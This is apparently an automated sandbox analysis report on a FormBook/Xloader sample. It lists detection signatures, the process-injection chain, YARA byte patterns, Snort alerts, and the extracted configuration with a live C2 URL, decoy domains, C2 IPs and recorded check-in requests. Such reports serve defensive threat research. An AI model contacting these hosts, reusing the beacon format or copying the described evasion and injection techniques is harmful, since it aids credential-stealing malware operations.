Loading ...

Play interactive tourEdit tour

Windows Analysis Report 56460021473877.exe

Overview

General Information

Sample Name:56460021473877.exe
Analysis ID:502358
MD5:d95e9bb2fa064a984c391b5bfc1d01e6
SHA1:6b045974084794b785110909351e2a25950c5ed6
SHA256:b499be4b6955eebcf4228039f67a65a38b322f0ca1d58d8071de9a428ced8720
Tags:exeXloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 56460021473877.exe (PID: 5240 cmdline: 'C:\Users\user\Desktop\56460021473877.exe' MD5: D95E9BB2FA064A984C391B5BFC1D01E6)
    • 56460021473877.exe (PID: 5276 cmdline: C:\Users\user\Desktop\56460021473877.exe MD5: D95E9BB2FA064A984C391B5BFC1D01E6)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 980 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 7156 cmdline: /c del 'C:\Users\user\Desktop\56460021473877.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nottryingdoing.com/ni8b/"], "decoy": ["billaning.com", "nhmingwei.com", "sapphiremodule.com", "533washingtonave.com", "dlscord-partners.com", "303cf.com", "hooleyfamilygoods.com", "productiongv.com", "intaom.com", "juanmarket.net", "thecrystalconsciousness.com", "sgosthirxz.sbs", "solobookings.com", "formulaonline.xyz", "gulliblegirls.com", "pureselva.com", "rusporn.xxx", "ed-institute.com", "serviciosgeneralesjba.online", "4x4pac.com", "trpgame.com", "shopbeerbelly.com", "box-770.com", "3tshaircreations.com", "nstyle.one", "txsports.club", "chirmano.com", "herehardcore.com", "shoetowers.com", "flipkartsdealscart.xyz", "lechila.com", "aag-trading.com", "werloshop.com", "bcmegroupbrd.xyz", "bogosamba.com", "sehermughal.com", "flexzapato.online", "citestaccnt1631552650.com", "anisyuko.xyz", "norllix.com", "socichat.one", "mia-mania.net", "web3designstudio.com", "eastsidescooters.com", "mymillionmission.com", "media777.club", "undeclined.info", "zhongrct.com", "sifangktv.mobi", "lindseystirlingvip.com", "kiccleaningservicesfl.com", "rafaelelais.com", "davewalkergreenberet.com", "prideparties.com", "ouzoudcaro.com", "ps-sac.com", "holmdelfirst.com", "ville-fogalmam.com", "sellmycarhudsoncounty.com", "celltecstore.com", "australiapost.digital", "rajinderbeas.com", "cabofishingreport.com", "purpari.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ab9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bcc:$sqlite3step: 68 34 1C 7B E1
    • 0x6ae8:$sqlite3text: 68 38 2A 90 C5
    • 0x6c0d:$sqlite3text: 68 38 2A 90 C5
    • 0x6afb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c23:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.56460021473877.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.56460021473877.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.56460021473877.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ab9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bcc:$sqlite3step: 68 34 1C 7B E1
        • 0x16ae8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c0d:$sqlite3text: 68 38 2A 90 C5
        • 0x16afb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c23:$sqlite3blob: 68 53 D8 7F 8C
        3.2.56460021473877.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.56460021473877.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nottryingdoing.com/ni8b/"], "decoy": ["billaning.com", "nhmingwei.com", "sapphiremodule.com", "533washingtonave.com", "dlscord-partners.com", "303cf.com", "hooleyfamilygoods.com", "productiongv.com", "intaom.com", "juanmarket.net", "thecrystalconsciousness.com", "sgosthirxz.sbs", "solobookings.com", "formulaonline.xyz", "gulliblegirls.com", "pureselva.com", "rusporn.xxx", "ed-institute.com", "serviciosgeneralesjba.online", "4x4pac.com", "trpgame.com", "shopbeerbelly.com", "box-770.com", "3tshaircreations.com", "nstyle.one", "txsports.club", "chirmano.com", "herehardcore.com", "shoetowers.com", "flipkartsdealscart.xyz", "lechila.com", "aag-trading.com", "werloshop.com", "bcmegroupbrd.xyz", "bogosamba.com", "sehermughal.com", "flexzapato.online", "citestaccnt1631552650.com", "anisyuko.xyz", "norllix.com", "socichat.one", "mia-mania.net", "web3designstudio.com", "eastsidescooters.com", "mymillionmission.com", "media777.club", "undeclined.info", "zhongrct.com", "sifangktv.mobi", "lindseystirlingvip.com", "kiccleaningservicesfl.com", "rafaelelais.com", "davewalkergreenberet.com", "prideparties.com", "ouzoudcaro.com", "ps-sac.com", "holmdelfirst.com", "ville-fogalmam.com", "sellmycarhudsoncounty.com", "celltecstore.com", "australiapost.digital", "rajinderbeas.com", "cabofishingreport.com", "purpari.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY
          Multi AV Scanner detection for domain / URLShow sources
          Source: serviciosgeneralesjba.onlineVirustotal: Detection: 5%Perma Link
          Source: 3.2.56460021473877.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 56460021473877.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 56460021473877.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe, 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe
          Source: Binary string: control.pdbUGP source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49811 -> 154.208.173.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49817 -> 67.205.83.103:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49851 -> 31.170.167.144:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49854 -> 44.227.65.245:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.5.157.71 80
          Source: C:\Windows\explorer.exeNetwork Connect: 216.10.241.4 80
          Source: C:\Windows\explorer.exeDomain query: www.eastsidescooters.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.205.83.103 80
          Source: C:\Windows\explorer.exeDomain query: www.celltecstore.com
          Source: C:\Windows\explorer.exeDomain query: www.thecrystalconsciousness.com
          Source: C:\Windows\explorer.exeDomain query: www.ps-sac.com
          Source: C:\Windows\explorer.exeDomain query: www.ville-fogalmam.com
          Source: C:\Windows\explorer.exeDomain query: www.box-770.com
          Source: C:\Windows\explorer.exeDomain query: www.txsports.club
          Source: C:\Windows\explorer.exeDomain query: www.rajinderbeas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 31.170.167.144 80
          Source: C:\Windows\explorer.exeDomain query: www.nhmingwei.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.208.173.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 148.72.177.185 80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nottryingdoing.com/ni8b/
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1Host: www.nhmingwei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1Host: www.celltecstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1Host: www.ps-sac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1Host: www.txsports.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1Host: www.rajinderbeas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1Host: www.box-770.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1Host: www.thecrystalconsciousness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 213.186.33.5 213.186.33.5
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: control.exe, 00000008.00000002.941761338.0000000004CE2000.00000004.00020000.sdmpString found in binary or memory: http://thecrystalconsciousness.com/ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3S
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 56460021473877.exe, 00000000.00000002.699621675.0000000006A60000.00000004.00020000.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: 56460021473877.exe, 00000000.00000002.694670637.0000000000AF7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comceomz
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 56460021473877.exe, 00000000.00000002.699180917.00000000065B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.nhmingwei.com
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=bnsPHpJ0JXfYedDeyyRM0T59hyvcJozMf52DwVsUkht3MP5YfvQl77Z8cLzJCfxgsHVQ&kTY=TdZdU HTTP/1.1Host: www.nhmingwei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=Zvg5mbxlh1FEUeAb4a18wQGVMNqECI22VVMpQ/dBRbKZgYLiDL5+JoutiYtpnsrAj+vq&kTY=TdZdU HTTP/1.1Host: www.celltecstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=Eseu83Nj43qLBMj7MwWHNBqOzdwc7j/6ub3THp3k2Y03CkKraCnGH8IbXpARdpoCPKFf&kTY=TdZdU HTTP/1.1Host: www.ps-sac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=lGGQ0sEZ2PLdmlcqvZgUhQs2XHM9QQiXiItD8ZWi5Y/Bd+WpsK3C+f5erJECmSl9JpeM&kTY=TdZdU HTTP/1.1Host: www.txsports.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=NtJPN2JufTPSUZxhVG2lwHAXNu/91wCxk6QRP91Jym6+DWJgifkFBuY1HfUXqRvRWjoF&kTY=TdZdU HTTP/1.1Host: www.rajinderbeas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=5gklYs16rcBoTPwexQgZaEg2WcCOIBmXVnGtPO+7DRUqV3YS52r/gKUkKnDwsfv+vOIy&kTY=TdZdU HTTP/1.1Host: www.box-770.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ni8b/?ZfEhPp=JVySAPp733wZmQfNstMcOnNrXbLvf0xUB0jZ2Inh4UzmMU775P3StTy/F8q5n6jJiQm6&kTY=TdZdU HTTP/1.1Host: www.thecrystalconsciousness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: 56460021473877.exe, 00000000.00000002.693859689.00000000007F0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.730886485.000000000EEF1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763748004.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.940364992.0000000002530000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.695508447.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.762828125.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.939915779.0000000000500000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.763621485.00000000011C0000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.56460021473877.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.56460021473877.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.56460021473877.exe.350fe30.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.56460021473877.exe.34c5c10.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.752209654.000000000EEF1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.940519272.0000000002830000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
